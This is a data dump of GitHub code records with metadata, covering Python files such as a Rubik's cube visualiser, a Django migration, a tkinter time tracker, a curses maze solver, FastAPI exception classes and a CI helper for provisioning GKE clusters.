"nipype.interfaces.base.TraitedSpec", "line_number": 160, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.Directory", "line_number": 162, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.File", "line_number": 163, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.CommandLine", "line_number": 167, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path", "line_number": 187, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 189, "usage_type": "call"}, {"api_name": "os.path", "line_number": 189, "usage_type": "attribute"}]} +{"seq_id": "2692903708", "text": "import click\nfrom enum import Enum\nfrom typing import TypeVar, Type\n\n\nE = TypeVar(\"E\", bound=Enum)\n\n\ndef parse_choice(factory: Type[E]):\n def _parse(ctx, param, value) -> None:\n values = list(map(lambda e: e.value, factory))\n param.type = click.Choice(values)\n param.expose_value = False\n if value:\n ctx.params[param.name] = factory(value)\n\n return _parse\n", "repo_name": "he-dev/reusable-py", "sub_path": "daily_click/src/daily_click/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TypeVar", "line_number": 6, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 9, "usage_type": "name"}, {"api_name": "click.Choice", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "23527930356", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('news', '0006_catalog_page_number'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='catalog',\n name='page_number',\n ),\n migrations.AddField(\n model_name='catalogpage',\n name='page_number',\n field=models.PositiveIntegerField(verbose_name='Page Number', default=1),\n preserve_default=False,\n ),\n ]\n", "repo_name": "rogergaitan/granadatiles", "sub_path": "granadatiles_project/apps/news/migrations/0007_auto_20160303_1832.py", "file_name": "0007_auto_20160303_1832.py", "file_ext": "py", "file_size_in_byte": 588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.RemoveField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "37035353613", "text": "import matplotlib.pyplot as plt\r\nimport math\r\nfrom mpl_toolkits import mplot3d\r\nimport numpy as np\r\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\r\nimport random as rand\r\n\r\nclass quaternion():\r\n \"\"\"Generic quaternion class\r\n \r\n \"\"\"\r\n def __init__(self,c,x,y,z):\r\n \"\"\"Create quaternion\r\n \r\n Arguments:\r\n (c,x,y,z) = c + xi + yj + zk\r\n \"\"\"\r\n self.c=c\r\n self.x=x\r\n self.y=y\r\n self.z=z\r\n \r\n def get_coord(self):\r\n \"\"\"Obtain coordinates\r\n \r\n Returns:\r\n (float, float, float, float) -- coordinates\r\n \"\"\"\r\n return (self.c, self.x, self.y, self.z)\r\n\r\n def multiply(quat1, quat2):\r\n \"\"\"Multiply 2 quaternions. Note, order matters\r\n \r\n Arguments:\r\n quat1 {quaternion}\r\n quat2 {quaternion}\r\n \r\n Returns:\r\n quaternion - product of quat1*quat2\r\n \"\"\"\r\n (c1,x1,y1,z1)=quat1.get_coord()\r\n (c2,x2,y2,z2)=quat2.get_coord()\r\n \r\n c3=c1*c2-x1*x2-y1*y2-z1*z2\r\n x3=c1*x2+x1*c2+y1*z2-z1*y2\r\n y3=c1*y2-x1*z2+y1*c2+z1*x2\r\n z3=c1*z2+x1*y2-y1*x2+z1*c2\r\n \r\n return quaternion(c3,x3,y3,z3)\r\n \r\n def conjugate(quat):\r\n \"\"\"Returns conjugate (c - xi - yj - zk) of input\r\n \r\n Arguments:\r\n quat {quaternion}\r\n \r\n Returns:\r\n quaternion\r\n \"\"\"\r\n (c,x,y,z)=quat.get_coord()\r\n return quaternion(c,-x,-y,-z)\r\n\r\nclass face():\r\n def __init__(self, color, x,y,z, direction, size):\r\n self.color=color\r\n self.quat=quaternion(0,x,y,z)\r\n self.direction=quaternion(0,*direction)\r\n self.size=size\r\n \r\n def rotate(self, angle, x,y,z):\r\n s=math.sin(angle/2)\r\n r=quaternion(math.cos(angle/2), s*x, s*y, s*z)\r\n q1 = quaternion.multiply(r, self.quat)\r\n self.quat = quaternion.multiply(q1, quaternion.conjugate(r))\r\n \r\n q2 = quaternion.multiply(r, self.direction)\r\n self.direction = quaternion.multiply(q2, quaternion.conjugate(r))\r\n \r\n def draw(self, ax):\r\n (_,x,y,z)=self.quat.get_coord()\r\n (_,d1,d2,d3)=self.direction.get_coord()\r\n \r\n dim1=[-self.size, self.size, self.size, -self.size]\r\n dim2=[-self.size, -self.size, self.size, self.size]\r\n \r\n x_list=[x]*4\r\n y_list=[y]*4\r\n z_list=[z]*4\r\n \r\n idx = np.argmax([abs(d1), abs(d2), abs(d3)])\r\n \r\n if idx==0:\r\n y_list = [y_list[i]+dim1[i] for i in range(4)]\r\n z_list = [z_list[i]+dim2[i] for i in range(4)]\r\n elif idx==1:\r\n x_list = [x_list[i]+dim1[i] for i in range(4)]\r\n z_list = [z_list[i]+dim2[i] for i in range(4)]\r\n else:\r\n y_list = [y_list[i]+dim1[i] for i in range(4)]\r\n x_list = [x_list[i]+dim2[i] for i in range(4)]\r\n \r\n verts = [list(zip(x_list,y_list,z_list))]\r\n ax.add_collection3d(Poly3DCollection(verts, \r\n facecolors=self.color, linewidths=1, edgecolors='k', alpha=1))\r\n\r\nclass rubiks_cube():\r\n colors={'white':(1,0,0), 'red':(0,1,0), 'blue':(0,0,1), 'yellow':(-1,0,0), 'orange':(0,-1,0), 'green':(0,0,-1)}\r\n \r\n def __init__(self):\r\n self.faces=[]\r\n self.fig = plt.figure()\r\n self.ax = plt.axes(projection='3d')\r\n \r\n for c in self.colors:\r\n for i in [-2/3,0,2/3]:\r\n for j in [-2/3,0,2/3]:\r\n (x,y,z)=self.colors[c]\r\n if x != 0:\r\n y=i\r\n z=j\r\n elif y != 0:\r\n z=i\r\n x=j\r\n else:\r\n x=i\r\n y=j\r\n self.faces.append(face(c,x,y,z,direction=self.colors[c], size=1/3))\r\n \r\n def draw(self):\r\n plt.cla()\r\n for f in self.faces:\r\n f.draw(self.ax)\r\n self.ax.set_xlim(-1.5,1.5)\r\n self.ax.set_ylim(-1.5,1.5)\r\n self.ax.set_zlim(-1.5,1.5)\r\n self.fig.canvas.draw()\r\n \r\n \r\n def turn_side(self, color, angle):\r\n vec = self.colors[color]\r\n for f in self.faces:\r\n q = f.quat\r\n v = (q.x*vec[0], q.y*vec[1], q.z*vec[2])\r\n if sum(v)>0.5:\r\n f.rotate(angle, *vec)\r\n \r\n def scramble(self, moves=20, draw=True):\r\n for i in range(moves):\r\n c = rand.choice(list(self.colors.keys()))\r\n angle = rand.choice([math.pi/2, -math.pi/2])\r\n self.turn_side(c,angle)\r\n if draw:\r\n self.draw()\r\n \r\n def is_solved(self):\r\n for f in self.faces:\r\n ans = [0]+[round(i) for i in self.colors[f.color]]\r\n d = [round(i) for i in f.direction.get_coord()]\r\n if ans!=d:\r\n return False\r\n return True\r\n \r\n \r\n\r\nif __name__=='__main__':\r\n rand.seed()\r\n plt.ion()\r\n r = rubiks_cube()\r\n r.draw()\r\n colors = {'w':'white', 'r':'red', 'b':'blue', 'y':'yellow', 'o':'orange', 'g':'green'}\r\n directions = {'+':math.pi/2, '-':-math.pi/2}\r\n while(True):\r\n i = input(\"Input command:\")\r\n try:\r\n if i=='break':\r\n break\r\n elif i=='help':\r\n print(\"break: exit program\")\r\n print(\"sXX: scramble cube (XX is the number of moves to scramble)\")\r\n print(\"?: check if cube is solved\")\r\n print(\"CD: rotate side. C-color{r,g,b,w,y,o}, D-direction{+,-}\")\r\n elif i==\"?\":\r\n print(r.is_solved())\r\n elif 's' in i:\r\n if len(i)>1:\r\n num=int(i[1:])\r\n else:\r\n num=20\r\n r.scramble(num)\r\n r.draw()\r\n else:\r\n c = colors[i[0]]\r\n d = directions[i[1]]\r\n r.turn_side(c,d)\r\n r.draw()\r\n except:\r\n print('Invalid input. Type \"help\" for details')", "repo_name": "andrewzhang505/rubiks_cube", "sub_path": "rubiks_cube.py", "file_name": "rubiks_cube.py", "file_ext": "py", "file_size_in_byte": 6156, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.sin", "line_number": 71, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 90, "usage_type": "call"}, {"api_name": "mpl_toolkits.mplot3d.art3d.Poly3DCollection", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 149, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 150, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 150, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 171, "usage_type": "attribute"}]} +{"seq_id": "689593546", "text": "import sys\nfrom pathlib import Path\n\nimport numpy as np\n\nfrom common.constants import boltzmann_constant\nfrom common.lattice_tools.common import change_basis\nfrom md.configuration import MDConfig\n\n\nif __name__ == '__main__':\n temp_dir = Path(sys.argv[1])\n print(sys.argv[1])\n\n cum_pos_hist = None\n\n for temp_ind_dir in temp_dir.glob('*'):\n if not temp_ind_dir.is_dir():\n continue\n print(temp_ind_dir)\n\n config = MDConfig.load(temp_ind_dir)\n resolution = 100\n\n positions = np.load(config.working_directory / 'absorbate_positions.npy')[:2]\n\n in_first_cell_lattice_coords = change_basis(\n np.linalg.inv(config.in_plane_basis[:2, :2]),\n positions\n ) % 1\n\n half_bin_width = 1 / resolution / 2\n\n x_bin_edges = np.linspace(- half_bin_width, 1 + half_bin_width, resolution + 2)\n y_bin_edges = np.linspace(- half_bin_width, 1 + half_bin_width, resolution + 2)\n\n # import matplotlib.pyplot as plt\n # plt.hist2d(*change_basis(config.in_plane_basis, in_first_cell_lattice_coords), bins=60)\n # plt.show()\n\n pos_hist, _, _ = np.histogram2d(*in_first_cell_lattice_coords, bins=[x_bin_edges, y_bin_edges])\n pos_hist[:, 0] += pos_hist[:, -1]\n pos_hist[0, :] += pos_hist[-1, :]\n\n pos_hist = pos_hist[:-1, :-1]\n\n if cum_pos_hist is None:\n cum_pos_hist = pos_hist\n else:\n cum_pos_hist += pos_hist\n\n potential_grid = - np.log(cum_pos_hist) * boltzmann_constant * config.temperature\n potential_grid -= potential_grid.min()\n\n np.save(temp_dir / 'potential_grid.npy', potential_grid)\n", "repo_name": "jjhw3/gle_research", "sub_path": "simulation_scripts/run_each_temp/bin_occupations.py", "file_name": "bin_occupations.py", "file_ext": "py", "file_size_in_byte": 1669, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "md.configuration.MDConfig.load", "line_number": 22, "usage_type": "call"}, {"api_name": "md.configuration.MDConfig", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 25, "usage_type": "call"}, {"api_name": "common.lattice_tools.common.change_basis", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.histogram2d", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 52, "usage_type": "call"}, {"api_name": "common.constants.boltzmann_constant", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.save", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "22743714565", "text": "import tkinter as tk\nimport datetime\nimport csv\n\nclass TimeTrackerPro:\n def __init__(self, root):\n self.root = root\n self.root.geometry(\"300x350+50+50\")\n self.root.title(\"Time Tracker Pro\")\n\n self.timer_running = False\n self.start_time = None\n self.project_name = \"\"\n self.task_description = \"\"\n\n self.lbl_time = tk.Label(root, text=\"00:00:00\", font=(\"Helvetica\", 48))\n self.lbl_project = tk.Label(root, text=\"Project: \")\n self.lbl_description = tk.Label(root, text=\"Task Description: \")\n self.entry_project = tk.Entry(root)\n self.entry_description = tk.Entry(root)\n self.btn_start = tk.Button(root, text=\"Start\", command=self.start_timer)\n self.btn_stop = tk.Button(root, text=\"Stop\", command=self.stop_timer)\n self.btn_save = tk.Button(root, text=\"Save\", command=self.save_entry)\n\n self.lbl_time.pack(pady=20)\n self.lbl_project.pack()\n self.entry_project.pack()\n self.lbl_description.pack()\n self.entry_description.pack()\n self.btn_start.pack(pady=10)\n self.btn_stop.pack(pady=10)\n self.btn_save.pack(pady=10)\n\n def start_timer(self):\n if not self.timer_running:\n self.timer_running = True\n self.start_time = datetime.datetime.now()\n self.update_timer()\n\n self.project_name = self.entry_project.get()\n self.task_description = self.entry_description.get()\n\n def stop_timer(self):\n if self.timer_running:\n self.timer_running = False\n\n def save_entry(self):\n entry_data = {\n \"Project\": self.project_name,\n \"Description\": self.task_description,\n \"StartTime\": self.start_time,\n \"EndTime\": datetime.datetime.now()\n }\n \n now = datetime.datetime.now()\n filename = entry_data[\"Project\"] + '-' + str(now) + \".csv\"\n with open(filename, 'w') as f:\n w = csv.DictWriter(f, entry_data.keys())\n w.writeheader()\n w.writerow(entry_data)\n\n\n def update_timer(self):\n if self.timer_running:\n elapsed_time = datetime.datetime.now() - self.start_time\n elapsed_time_str = str(elapsed_time).split(\".\")[0] # Format: HH:MM:SS\n self.lbl_time.config(text=elapsed_time_str)\n self.root.after(1000, self.update_timer)\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n app = TimeTrackerPro(root)\n root.iconphoto(False, tk.PhotoImage(file=\"icon.png\"))\n root.mainloop()\n\n", "repo_name": "PenguinPoweredApps/TimeTrackerPro", "sub_path": "time_tracker_pro.py", "file_name": "time_tracker_pro.py", "file_ext": "py", "file_size_in_byte": 2572, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tkinter.Label", "line_number": 16, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 17, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 18, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 19, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 20, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 21, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 22, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 55, "usage_type": "attribute"}, {"api_name": "csv.DictWriter", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "attribute"}, {"api_name": "tkinter.Tk", "line_number": 71, "usage_type": "call"}, {"api_name": "tkinter.PhotoImage", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "2154731727", "text": "from django.urls import path, include\nfrom users import views\nfrom rest_framework.routers import SimpleRouter, DefaultRouter\n\n\nrouter = DefaultRouter()\nrouter.register(r'requests', views.MatchRequestViewSet)\nrouter.register(r'users', views.UserRetrieveUpdateViewSet)\n\n\nurlpatterns = [\n path('', include(router.urls)),\n path('new/', views.UserCreateView.as_view()),\n path('users/', views.UserListView.as_view({'get': 'list'})),\n path('matches/', views.MatchedUsersView.as_view()),\n path('users/me', views.SelfUserView.as_view()),\n\n]\n", "repo_name": "mirzxc/animeet-django-rest", "sub_path": "users/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 6, "usage_type": "call"}, {"api_name": "users.views.MatchRequestViewSet", "line_number": 7, "usage_type": "attribute"}, {"api_name": "users.views", "line_number": 7, "usage_type": "name"}, {"api_name": "users.views.UserRetrieveUpdateViewSet", "line_number": 8, "usage_type": "attribute"}, {"api_name": "users.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "users.views.UserCreateView.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "users.views.UserCreateView", "line_number": 13, "usage_type": "attribute"}, {"api_name": "users.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "users.views.UserListView.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "users.views.UserListView", "line_number": 14, "usage_type": "attribute"}, {"api_name": "users.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "users.views.MatchedUsersView.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "users.views.MatchedUsersView", "line_number": 15, "usage_type": "attribute"}, {"api_name": "users.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "users.views.SelfUserView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "users.views.SelfUserView", "line_number": 16, "usage_type": "attribute"}, {"api_name": "users.views", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "29437550920", "text": "\"\"\"\r\nDilyana Koleva, 2022\r\nIntermediate Python Projects - Breadth First Search\r\n\r\nIf working on PyCharm don't forget to edit the configuration to emulate terminal in output console\r\nEdit Configurations -> Click on the configuration -> Tick Emulate Terminal -> Apply\r\n\r\nAlso chances are the project won't run on PyCharm so run it directly through the terminal\r\n\r\n\"\"\"\r\nimport curses\r\nfrom curses import wrapper\r\nimport queue\r\nimport time\r\n\r\nmaze = [\r\n [\"#\", \"O\", \"#\", \"#\", \"#\", \"#\", \"#\", \"#\", \"#\"],\r\n [\"#\", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \"#\"],\r\n [\"#\", \" \", \"#\", \"#\", \" \", \"#\", \"#\", \" \", \"#\"],\r\n [\"#\", \" \", \"#\", \" \", \" \", \" \", \"#\", \" \", \"#\"],\r\n [\"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\"],\r\n [\"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\"],\r\n [\"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\", \"#\", \"#\"],\r\n [\"#\", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \"#\"],\r\n [\"#\", \"#\", \"#\", \"#\", \"#\", \"#\", \"#\", \"X\", \"#\"]\r\n]\r\n\r\n\r\ndef print_maze(maze, screen, path=[]):\r\n CYAN = curses.color_pair(1)\r\n RED = curses.color_pair(2)\r\n\r\n for i, row in enumerate(maze):\r\n for j, value in enumerate(row):\r\n if (i, j) in path:\r\n screen.addstr(i, j * 2, \"X\", RED)\r\n else:\r\n screen.addstr(i, j * 2, value, CYAN)\r\n\r\n\r\ndef find_start(maze, start):\r\n for i, row in enumerate(maze):\r\n for j, value in enumerate(row):\r\n if value == start:\r\n return i, j\r\n\r\n return None\r\n\r\n\r\ndef find_path(maze, screen):\r\n start = \"O\"\r\n end = \"X\"\r\n start_pos = find_start(maze, start)\r\n\r\n q = queue.Queue()\r\n q.put((start_pos, [start_pos]))\r\n\r\n visited = set()\r\n\r\n while not q.empty():\r\n current, path = q.get()\r\n row, col = current\r\n\r\n screen.clear()\r\n print_maze(maze, screen, path)\r\n time.sleep(0.2)\r\n screen.refresh()\r\n\r\n if maze[row][col] == end:\r\n return path\r\n\r\n neighbours = find_neighbours(maze, row, col)\r\n for n in neighbours:\r\n if n in visited:\r\n continue\r\n\r\n r, c = n\r\n if maze[r][c] == \"#\":\r\n continue\r\n\r\n new_path = path + [n]\r\n q.put((n, new_path))\r\n visited.add(n)\r\n\r\n\r\ndef find_neighbours(maze, row, col):\r\n neighbours = []\r\n\r\n if row > 0:\r\n neighbours.append((row - 1, col))\r\n if row + 1 < len(maze):\r\n neighbours.append((row + 1, col))\r\n if col > 0:\r\n neighbours.append((row, col - 1))\r\n if col + 1 < len(maze[0]):\r\n neighbours.append((row, col + 1))\r\n\r\n return neighbours\r\n\r\n\r\ndef main(screen):\r\n curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_WHITE)\r\n curses.init_pair(2, curses.COLOR_RED, curses.COLOR_WHITE)\r\n\r\n find_path(maze, screen)\r\n screen.getch()\r\n\r\n\r\nwrapper(main)\r\n", "repo_name": "littlepippilongstocking/Intermediate-Python-Projects", "sub_path": "shortest-path.py", "file_name": "shortest-path.py", "file_ext": "py", "file_size_in_byte": 2817, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "curses.color_pair", "line_number": 30, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 31, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 55, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 66, "usage_type": "call"}, {"api_name": "curses.init_pair", "line_number": 102, "usage_type": "call"}, {"api_name": "curses.COLOR_CYAN", "line_number": 102, "usage_type": "attribute"}, {"api_name": "curses.COLOR_WHITE", "line_number": 102, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 103, "usage_type": "call"}, {"api_name": "curses.COLOR_RED", "line_number": 103, "usage_type": "attribute"}, {"api_name": "curses.COLOR_WHITE", "line_number": 103, "usage_type": "attribute"}, {"api_name": "curses.wrapper", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "14526695224", "text": "from fastapi import Request\nfrom starlette.responses import JSONResponse\n\n\nclass AppExceptionCase(Exception):\n def __init__(self, status_code: int, context: dict):\n self.exception_case = self.__class__.__name__\n self.status_code = status_code\n self.context = context\n\n def __str__(self):\n return (\n f\"\"\n )\n\n\nasync def app_exception_handler(request: Request, exc: AppExceptionCase):\n return JSONResponse(\n status_code=exc.status_code,\n content={\n \"app_exception\": exc.exception_case,\n \"context\": exc.context,\n },\n )\n\n\nclass AppException(object):\n class HttpRequestParamsIllegal(AppExceptionCase):\n def __init__(self, context: dict = None):\n \"\"\"\n HTTP请求的参数错误\n \"\"\"\n status_code = 422\n AppExceptionCase.__init__(self, status_code, context)\n\n class HttpRequestTimeout(AppExceptionCase):\n def __init__(self, context: dict = None):\n \"\"\"\n HTTP请求超时\n \"\"\"\n status_code = 504\n AppExceptionCase.__init__(self, status_code, context)\n", "repo_name": "lvyv/phmMS", "sub_path": "app/utils/app_exceptions.py", "file_name": "app_exceptions.py", "file_ext": "py", "file_size_in_byte": 1284, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "fastapi.Request", "line_number": 18, "usage_type": "name"}, {"api_name": "starlette.responses.JSONResponse", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "14895195628", "text": "#!/usr/bin/env python3\n\n\"\"\"\nClusters used in test\n\nCopied from https://github.com/stackrox/stackrox/blob/master/.openshift-ci/clusters.py\n\"\"\"\n\nimport os\nimport signal\nimport subprocess\nimport time\n\nfrom common import popen_graceful_kill\n\n\nclass NullCluster:\n def provision(self):\n pass\n\n def teardown(self):\n pass\n\n\nclass GKECluster:\n # Provisioning timeout is tightly coupled to the time it may take gke.sh to\n # create a cluster.\n PROVISION_TIMEOUT = 90 * 60\n WAIT_TIMEOUT = 20 * 60\n TEARDOWN_TIMEOUT = 5 * 60\n PROVISION_PATH = \"scripts/ci/gke.sh\"\n WAIT_PATH = \"scripts/ci/gke.sh\"\n REFRESH_PATH = \"scripts/ci/gke.sh\"\n TEARDOWN_PATH = \"scripts/ci/gke.sh\"\n\n def __init__(self, cluster_id, num_nodes=3, machine_type=\"e2-standard-4\"):\n self.cluster_id = cluster_id\n self.num_nodes = num_nodes\n self.machine_type = machine_type\n self.refresh_token_cmd = None\n\n def provision(self):\n with subprocess.Popen(\n [\n GKECluster.PROVISION_PATH,\n \"provision_gke_cluster\",\n self.cluster_id,\n str(self.num_nodes),\n self.machine_type,\n ]\n ) as cmd:\n\n try:\n exitstatus = cmd.wait(GKECluster.PROVISION_TIMEOUT)\n if exitstatus != 0:\n raise RuntimeError(f\"Cluster provision failed: exit {exitstatus}\")\n except subprocess.TimeoutExpired as err:\n popen_graceful_kill(cmd)\n raise err\n\n # OpenShift CI sends a SIGINT when tests are canceled\n signal.signal(signal.SIGINT, self.sigint_handler)\n\n subprocess.run(\n [GKECluster.WAIT_PATH, \"wait_for_cluster\"],\n check=True,\n timeout=GKECluster.WAIT_TIMEOUT,\n )\n\n # pylint: disable=consider-using-with\n self.refresh_token_cmd = subprocess.Popen(\n [GKECluster.REFRESH_PATH, \"refresh_gke_token\"]\n )\n\n return self\n\n def teardown(self):\n while os.path.exists(\"/tmp/hold-cluster\"):\n print(\"Pausing teardown because /tmp/hold-cluster exists\")\n time.sleep(60)\n\n if self.refresh_token_cmd is not None:\n print(\"Terminating GKE token refresh\")\n try:\n popen_graceful_kill(self.refresh_token_cmd)\n except Exception as err:\n print(f\"Could not terminate the token refresh: {err}\")\n\n subprocess.run(\n [GKECluster.TEARDOWN_PATH, \"teardown_gke_cluster\"],\n check=True,\n timeout=GKECluster.TEARDOWN_TIMEOUT,\n )\n\n return self\n\n def sigint_handler(self, signum, frame):\n print(\"Tearing down the cluster due to SIGINT\", signum, frame)\n self.teardown()\n", "repo_name": "stackrox/scanner", "sub_path": ".openshift-ci/clusters.py", "file_name": "clusters.py", "file_ext": "py", "file_size_in_byte": 2844, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 38, "dataset": "github-code", "pt": "52", "api": [{"api_name": "subprocess.Popen", "line_number": 43, "usage_type": "call"}, {"api_name": "subprocess.TimeoutExpired", "line_number": 57, "usage_type": "attribute"}, {"api_name": "common.popen_graceful_kill", "line_number": 58, "usage_type": "call"}, {"api_name": "signal.signal", "line_number": 62, "usage_type": "call"}, {"api_name": "signal.SIGINT", "line_number": 62, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 64, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 80, "usage_type": "call"}, {"api_name": "common.popen_graceful_kill", "line_number": 85, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 89, "usage_type": "call"}]} +{"seq_id": "42445769529", "text": "import unittest\n\nfrom scripts.algorithms.term_focus import TermFocus\nfrom scripts.text_processing import LemmaTokenizer\nfrom scripts.tfidf_wrapper import tfidf_from_text\nfrom tests.utils import ReferenceData\n\n\n@unittest.skip(\"Temporarily shut down module\")\nclass TestFocus(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.num_ngrams = 5\n cold_tfidf = tfidf_from_text(ReferenceData.cold_df, tokenizer=LemmaTokenizer(), ngram_range=(2, 3))\n random_tfidf = tfidf_from_text(ReferenceData.random_df, tokenizer=LemmaTokenizer(), ngram_range=(2, 3))\n cls.tfocus = TermFocus(cold_tfidf, random_tfidf)\n\n def test_popular_ngrams_by_no_focus(self):\n expected_output = {'cold air flow', 'constant temperature', 'freezing chamber', 'ice store ready',\n 'utility chamber'}\n _, actual_output, _ = self.tfocus.detect_and_focus_popular_ngrams('sum', 